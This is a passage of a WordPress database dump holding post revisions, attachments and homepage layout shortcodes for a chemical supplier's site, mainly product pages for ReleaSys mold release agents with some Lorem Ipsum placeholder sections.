alt="heloxy-116" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<p style="text-align: left;"></p>\r\n\r\n<h4 style="text-align: left;"><strong>Polyurethane Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4289 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_116206609-340x340.jpg" alt="Concrete Release Agent" width="170" height="170" /></p>\r\n<img class="wp-image-1897 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-872-340x340.jpg" alt="epon-872" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<p style="text-align: left;"></p>\r\n\r\n<h4 style="text-align: left;"><strong>Rubber Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4179 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_375261412-340x340.jpg" alt="ReleaSys 8500 Rubber mold release agent" width="170" height="170" /></p>\r\n<img class="wp-image-1890 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-825-340x340.jpg" alt="EPON 825 EPON Resin 825" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4><strong>Injection Plastics Mold Release</strong></h4>\r\n<img class=" wp-image-4105 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_280244540-340x340.jpg" alt="Industrial Wire Coatings" width="170" height="170" />\r\n\r\n<img class="wp-image-1894 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-830-340x340.jpg" alt="Epon 830" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4><strong>Fiberglass Mold Release</strong></h4>\r\n<img class="wp-image-4102 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_195767891-340x340.jpg" alt="industrial-medical coatings" width="170" height="170" />\r\n<p class="alignnone"><img class="wp-image-1877 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3140-340x340.jpg" alt="Epikure 3140 Curing agent" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.</p>\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4><strong>Pre-Cast Mold Release Mold Release</strong></h4>\r\n<img class="wp-image-3723 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_359496941-340x340.jpg" alt="Krytox GB A2" width="170" height="170" />\r\n\r\n<img class="wp-image-1884 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3290-340x340.jpg" alt="epikure-3290" width="170" height="170" />\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-30 14:58:24', '2017-05-30 14:58:24', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4330, 3, '2017-05-30 15:02:07', '2017-05-30 15:02:07', '', 'shutterstock_521421886', '', 'inherit', 'closed', 'closed', '', 'shutterstock_521421886', '', '', '2017-05-30 15:02:07', '2017-05-30 15:02:07', '', 4326, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_521421886.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4331, 2, '2017-05-30 15:02:09', '2017-05-30 15:02:09', ' ', '', '', 'publish', 'closed', 'closed', '', '4331', '', '', '2017-05-30 15:02:09', '2017-05-30 15:02:09', '', 0, 'https://www.miller-stephenson.com/4331/', 12, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (4332, 3, '2017-05-30 15:06:32', '2017-05-30 15:06:32', 'Ideal for rapid mold release operations. Thermoplastic Mold Release Agent', 'Thermoplastic Mold Release Agent', 'Mold release Agent for plastics and thermosetting resins', 'inherit', 'closed', 'closed', '', 'shutterstock_568596037', '', '', '2017-06-16 15:57:33', '2017-06-16 15:57:33', '', 4326, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_568596037.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4333, 3, '2017-05-30 15:10:16', '2017-05-30 15:10:16', 'Composite mold release agent. Mold release coatings using ReleaSys 9800', 'Mold Release Coating', 'Composite molded with ReleaSys 9800', 'inherit', 'closed', 'closed', '', 'shutterstock_432641509', '', '', '2017-05-30 16:01:05', '2017-05-30 16:01:05', '', 4326, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_432641509.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4334, 3, '2017-05-30 15:30:19', '2017-05-30 15:30:19', '', 'releasys-9800', '', 'inherit', 'closed', 'closed', '', 'releasys-9800', '', '', '2017-05-30 15:30:34', '2017-05-30 15:30:34', '', 4326, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/ReleaSys-9800.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (4335, 3, '2017-05-30 17:05:29', '2017-05-30 17:05:29', '<h2>ReleaSys 9800™ Mold Release Coating</h2>\n<h3>Advanced Chemistry for Advanced Materials</h3>\nReleaSys 9800 mold release coating delivery sophisticated technology to today;s modern molding industries with an alternative to the traditional “shop-spray” or high volume, apply-every-cycle release agent. Miller-Stephenson has been at the forefront in developing the most effective products of this type and transitioning industries to these formulations for their molding processes as appropriate. We have focused on taking the message to our customers that "more is not necessarily better" when it comes to applying mold release agents. Today’s highly sophisticated water-based semi-permanent mold release coating technologies do more with less.  Our ReleaSys 9800 delivers the following benefits:\n<ul>\n 	<li>Excels at de-molding advanced composites and aggressive substrates</li>\n 	<li>Ideal for highly-polished; complex mold</li>\n 	<li>Tenacious adhesion to all molding surface</li>\n 	<li>Extended re-application intervals</li>\n 	<li>Rapid Cure; no heat required</li>\n 	<li>Minimal build-up and mold fouling</li>\n 	<li>Eco-friendly Water-based formulation</li>\n</ul>\nOur unique chemistry provides a mold release which exceeds the rigorous demands of manufacturing today\'s advanced composites and substrates. This proprietary chemistry comes in an eco-friendly, no VOC formulation and requires no extended cure times.  ReleaSys 9800 mold release coating forms an immediate, tenacious bond to the mold surface upon drying.  ReleaSys 9800 provides a simple, yet sophisticated mold release chemistry, designed for all high performance composites used in compression molding, resin transfer, vacuum bagging, filament-winding, mandrel-built, hand and spray layup processes. etc. This robust formulation excels equally well with other forms of molding and materials, and can be used to release more typical substrate such as polyurethane, thermoplastics, rubber/elastomers, and fiberglass. The advanced chemistry within ReleaSys 9800 holds tremendous utility and applicators will see the immediate effects.\n<ul>\n 	<li>Molded parts can be post-painted or glued with little or no surface preparation</li>\n 	<li>Decreased cost of scrap and waste.</li>\n 	<li>Reduced frequency of equipment maintenance and replacement</li>\n 	<li>Ability to restore and extend the life of your equipment</li>\n 	<li>Improved mold integrity, surface quality and throughput</li>\n 	<li>Low product application levels result in a cleaner working environment</li>\n</ul>\n<h3>More than 50 years of Industry Experience and D</h3>\nMiller-Stephenson experts have spent years focusing on how to improve composite molding operations by increasing efficiency, reducing waste and enhancing finished part quality. We have formulated several specialty mold release agents for just that purpose. As a leader in the development of water-based products, Miller-Stephenson ReleaSys product line offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products.\n\nMiller-Stephenson has had a long history in composite molding industries, and our ReleaSys brand of products are respected around the world for quality and reliability. When you purchase Miller-Stephenon ReleaSys Semi-Permanent mold release agents you not only get industry leading products, you also gain access to our many years of direct production floor experience. We understand your production issues and can help you optimize your mold preparation, maintenance and release processes to improve your bottom line.\n\n<a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For help with application or troubleshooting concerns while using ReleaSys.</strong></a>\n\n<strong><a href="https://www.miller-stephenson.com/mold-release-agents/">Click here for information, Which mold release agent is right for you</a></strong>', 'ReleaSys™ 9800 | Mold Release Coating', 'ReleaSys™ 9800 is a high-performance, high cross-linking water-based, semi-permanent mold release system. This formulation forms our most robust and durable coating, offering unmatched adhesion to all molding surfaces. ReleaSys 9800 provides highly sophisticated, advanced chemistry in a simple, one-coat water-based system which does not require time-consuming mold sealers or primers. Our coating acts as a sealer and release agent in single step, maximizing protection of your mold surface and increasing product throughput: Benefit include:\n<ul>\n 	<li>Tenacious surface adhesion and durability</li>\n 	<li>Rapid Cure; No heating required</li>\n 	<li>Ideal for Advanced Composites and Aggressive substrates</li>\n 	<li>No transfer; Flat-Satin finish</li>\n</ul>', 'inherit', 'closed', 'closed', '', '4326-autosave-v1', '', '', '2017-05-30 17:05:29', '2017-05-30 17:05:29', '', 4326, 'https://www.miller-stephenson.com/4326-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4336, 3, '2017-05-30 18:03:58', '2017-05-30 18:03:58', '<h2>ReleaSys™ 9900 Fiberglass Release Agent</h2>\r\n<h3>Sophisticated Chemical Solutions for Composite/FRP Molding Applications</h3>\r\nReleaSys 9900 Fiberglass release agent is a water-based release agent which utilizes a proprietary polymeric backbone that generates a mold coating that binds tenaciously to mold surfaces providing a durable thin film with excellent surface slip and ease of  release.  ReleaSys 9900 is ideally suited for reinforced polyester (FRP) composites due to its high slip coating, which cures quickly and provides multiple releases for low VOC polyester gel-coat and other tough releasing polyester structures. ReleaSys 9900 functions equally well for the release of epoxies, polyester resins, vinyl ester resins, thermoplastics, adhesives, and rotationally molded plastics. <span style="text-decoration: underline;">ReleaSys 9900 Fiberglass release agent</span> is particularly well suited for tougher to release processes such as filament winding and non gel coated polyester and fiberglass molding. Benefits of ReleaSys 9900 include:\r\n<ul>\r\n 	<li>Rapid Cure; High crosslinking</li>\r\n 	<li>Superior mold adherence and durability</li>\r\n 	<li>Exceptional utility across a broad range of substrates</li>\r\n 	<li>Ideally suited for FRP composites and Thermoplastics</li>\r\n 	<li>Improves part quality; Protects mold surface</li>\r\n 	<li>Eco-friendly Waterbased formulation</li>\r\n 	<li>Low odor; No VOC</li>\r\n</ul>\r\n<h3>Miller-Stephenson Specializes in the Development of High-Performance Mold Release Solutions</h3>\r\nReleaSys 9900 Fiberglass release agent was developed in direct response to our customers needs. Our customers required a mold release agent that was not only water-based but also could cure rapidly without the need for high heat exposure. Putting over 50 years of mold release expertise to use, Miller-Stephenson chemists developed a revolutionary product which not only has a rapid cure (even at room temperature) but displays superior abrasion resistance, durability and surface slip.  ReleaSys 9900 is a mold release agent which can release numerous parts without reapplication, regardless of the substrate, while simultaneous increasing part quality and minimizing mold release agent transfer. The advanced chemistry within ReleaSys 9900 holds tremendous utility and applicators will see the immediate effects:\r\n<ul>\r\n 	<li>Molded parts can be post-painted or glued with little or no surface preparation</li>\r\n 	<li>Decreased cost of scrap and waste.</li>\r\n 	<li>Reduced frequency of equipment maintenance and replacement</li>\r\n 	<li>Ability to restore and extend the life of your equipment</li>\r\n 	<li>Improved mold integrity, surface quality and throughput</li>\r\n 	<li>Low product application levels result in a cleaner working environment</li>\r\n</ul>\r\n<h3>50+ years of Industry Expertise at your service</h3>\r\nMiller-Stephenson has had a long history in composite molding industries, and our ReleaSys brand of products are respected around the world for quality and reliability. When you purchase Miller-Stephenon ReleaSys Semi-Permanent mold release agents you not only get industry leading products, you also gain access to our many years of direct production floor experience. We understand your production issues and can help you optimize your mold preparation, maintenance and release processes to improve your bottom line.\r\n\r\n<a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For help with application or troubleshooting concerns while using ReleaSys.</strong></a>\r\n\r\n<strong><a href="https://www.miller-stephenson.com/mold-release-agents/">Click here for information, Which mold release agent is right for you</a></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'ReleaSys™ 9900 | Fiberglass Release Agent', 'ReleaSys 9900 is a water-based release agent which utilizes a proprietary polymeric backbone that generates a coating that binds tenaciously to mold surfaces providing a durable thin film with excellent surface slip and ease of release.  ReleaSys 9900 is ideally suited for reinforced polyester (FRP) composites due to its high slip coating, which cures quickly and provides multiple releases.  ReleaSys 9900 functions equally well for the release of epoxies, polyester resins, vinyl ester resins, thermoplastics, adhesives, and rotationally molded plastics. Benefits include:\r\n<ul>\r\n 	<li>Rapid Cure; High crosslinking</li>\r\n 	<li>Superior mold adherence and durability</li>\r\n 	<li>Exceptional utility across a broad range of substrates</li>\r\n 	<li>Ideally suited for FRP composites and Thermoplastics</li>\r\n 	<li>Improves part quality; Protects mold surface</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'releasys-9900-fiberglass-release-agent', '', '', '2017-06-04 17:54:07', '2017-06-04 17:54:07', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=4336', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (4337, 3, '2017-05-30 17:13:37', '2017-05-30 17:13:37', '', 'Fiberglass Release Agent', '', 'inherit', 'closed', 'closed', '', 'shutterstock_528597541', '', '', '2017-05-30 17:13:50', '2017-05-30 17:13:50', '', 4336, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_528597541.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4338, 0, '2017-05-30 17:30:20', '2017-05-30 17:30:20', '', '', '', 'publish', 'closed', 'closed', '', '4338', '', '', '2017-05-30 17:30:21', '2017-05-30 17:30:21', '', 0, 'https://www.miller-stephenson.com/nf_sub/4338/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4339, 3, '2017-05-30 17:41:26', '2017-05-30 17:41:26', '', 'releasys-9900', '', 'inherit', 'closed', 'closed', '', 'releasys-9900', '', '', '2017-05-30 17:41:26', '2017-05-30 17:41:26', '', 4336, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/ReleaSys-9900.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (4340, 3, '2017-05-30 18:15:44', '2017-05-30 18:15:44', 'Mold release agent designed for composites and FRP. ReleaSys 9800 mold release coating', 'Mold Release Coating', 'ReleaSys 9800 Composite mold release agent ', 'inherit', 'closed', 'closed', '', 'shutterstock_388748860', '', '', '2017-05-30 18:16:50', '2017-05-30 18:16:50', '', 4326, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_388748860.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4341, 1, '2017-05-30 18:15:54', '2017-05-30 18:15:54', '[ux_banner_grid height="500" depth="3" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" radius="62" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4144" bg_size="orginal" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" position_x="100" position_y="0"]\n\n[button text="Industrial &amp; medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Custom Solutions</h3>\n<p>Custom-built mold release agent, specialty coating or unique formulation. Our engineering department can design a solution for your application needs.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Large Inventory</h3>\n<p>Our four fully stocked USA & Canadian locations allow us to ensure swift delivery. Vast KRYTOX inventory of most grades at bulk pricing.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/featured_box]\n\n[/col]\n[col]\n\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle" link="https://www.miller-stephenson.com/releasys-release-agent/"]\n\n[text_box width="47" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys™ </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" color="white" style="outline" radius="82" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-30 18:15:54', '2017-05-30 18:15:54', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4342, 1, '2017-05-30 18:17:33', '2017-05-30 18:17:33', '[ux_banner_grid height="500" depth="3" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="ABOUT US" color="white" style="outline" size="xlarge" radius="62" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4144" bg_size="orginal" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" position_x="100" position_y="0"]\n\n[button text="Industrial &amp; medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Custom Solutions</h3>\n<p>Custom-built mold release agent, specialty coating or unique formulation. Our engineering department can design a solution for your application needs.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Application 